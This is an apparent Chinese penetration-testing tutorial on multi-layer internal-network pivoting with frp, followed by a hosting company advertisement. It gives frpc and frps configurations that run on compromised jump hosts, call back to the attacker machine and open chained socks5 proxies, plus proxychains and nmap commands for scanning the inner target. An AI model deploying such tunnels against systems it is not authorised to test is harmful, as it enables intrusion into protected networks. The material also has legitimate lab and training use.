使用frp隧道穿透多层内网-创新互联

内网环境说明
10.1.200.10  								攻击机
10.1.200.20/172. 16.200.20		跳板机1
172.16.30/192.168.33.30			跳板机2
192.168.33.66								目标
frpc是frp的客户端
客户端一般安装在被渗透机器上,在不需要双层内网渗透的情况下只需要上传frpc
配置文件:
[common] 
server_addr = 192.168.1.20	//frps服务ip
server_port = 7000					//frps服务端口
[socks5] 
type = tcp 
plugin = socks5 
remote_port = 5000					//渗透机或跳板机使用的端口
frps是frp的服务端
frps是frp的服务端单层内网情况下只安装在渗透机,双层内网需要安装在跳板机中。
配置文件:
[common]
bind_port = 7000 //frps的服务端的端口
运行
frpc:	./frpc -c frpc.ini(配置文件)
frps:   ./frps -c frps.ini(配置文件)
配置使用的代理(linux)
leafpad /etc/proxychains.conf
添加socks5 127.0.0.1 5000,这里的5000对应上frpc.ini配置文件中的socks5代理端口
proxychains nmap -Pn -sT -T4 192.168.1.20 代理nmap扫描
双层内网配置
渗透机
	proxychains.conf配置
	socks5 127.0.0.1 8000			172段
	socks5 127.0.0.1 9000			192段
	10.1.200.10  				本机ip10.1.200.10,代理端口8000 172段 代理端口9000 192段
	frps配置:
	[common]
	bind_port = 7000				//frps服务的端口非代理端口
跳板机1
	10.1.200.20/172. 16.200.20		//双网卡主机
	frps配置
	[common]
	bind_port = 7000				//frps服务的端口非代理端口
	frpc配置
	[common]
	server_addr = 10.1.200.10
	server_port = 7000

	[socks5_172]
	type = tcp
	plugin = socks5
	remote_port = 8000			//172段sockts5代理端口(渗透机)						

	[socks5_192]
	type = tcp
	local_ip = 127.0.0.1
	local_port = 9999				//跳板机2的sockts5代理端口
	remote_port = 9000			//192段sockts5代理端口(渗透机)
	说明:跳板机1向渗透机代理两个sockts5端口分别是8000端口和9000端口,8000端口代表172段是跳板机本机能访问的,
	9000端口是192段跳板机1本来是不能访问但是获取了跳板机2的权限配置了代理因此可以相当于转发了跳板机2的流量。
跳板机2
	172.16.30/192.168.33.30		//双网卡主机
	frpc配置
	[common]
	server_addr = 172. 16.200.20
	server_port = 7000

	[socks5_192_172]
	type = tcp
	plugin = socks5
	remote_port = 9999
	说明:跳板机2只需要配置frpc即可,frps的ip地址填写的是跳板机1的ip并且对应上跳板机1的sockts5代理端口,最终使得渗透机可以访问目标。

你是否还在寻找稳定的海外服务器提供商?创新互联www.cdcxhl.cn海外机房具备T级流量清洗系统配攻击溯源,准确流量调度确保服务器高可用性,企业级服务器适合批量采购,新人活动首月15元起,快前往官网查看详情吧

成都创新互联成立于2013年,我们提供高端网站建设成都网站制作公司成都网站设计、网站定制、成都全网营销推广小程序制作、微信公众号开发、网站推广服务,提供专业营销思路、内容策划、视觉设计、程序开发来完成项目落地,为成都服务器托管企业提供源源不断的流量和订单咨询。
当前标题:使用frp隧道穿透多层内网-创新互联
网页URL:http://scjbc.cn/article/eijdg.html

其他资讯